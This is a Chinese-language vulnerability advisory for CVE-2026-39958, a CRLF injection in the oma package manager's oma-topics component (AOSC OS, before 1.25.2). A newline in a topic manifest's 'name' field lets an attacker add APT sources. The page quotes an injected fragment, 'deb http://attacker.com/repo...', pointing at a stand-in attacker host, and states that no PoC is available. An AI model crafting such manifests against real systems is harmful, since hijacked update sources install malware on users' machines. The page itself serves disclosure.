IPBUF安全漏洞报告
English
CVE-2026-39958 CVSS 9.1

oma包管理器存在CRLF注入漏洞允许添加恶意APT源

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-39958
漏洞类型
CRLF注入
CVSS评分
9.1
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
oma (AOSC OS)

相关标签

暂无标签

漏洞概述

AOSC OS的包管理器oma在1.25.2之前的版本中存在严重漏洞。oma-topics组件在处理远程仓库的Topic Manifests元数据时,未对“name”字段进行转义检查。攻击者可利用此漏洞提供包含恶意数据的清单,导致系统在/etc/apt/sources.list.d/atm.list中写入未授权的APT源条目,从而劫持软件更新过程。

技术细节

该漏洞源于oma-topics组件在处理从远程服务器获取的Topic Manifests(topics.json)时,未对元数据中的“name”字段进行严格的转义或过滤。攻击者可以构造一个恶意的JSON文件,在“name”字段中插入换行符(\n)和APT源配置指令。当oma-topics获取并注册该元数据时,它会将此字段直接写入/etc/apt/sources.list.d/atm.list文件。由于未过滤换行符,攻击者注入的“deb http://attacker.com/repo...”会被解析为新的APT源,从而控制包管理器的源列表,可能导致后续安装恶意软件。

PoC / 利用代码

暂无PoC代码

影响范围

暂无版本信息

防御指南

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表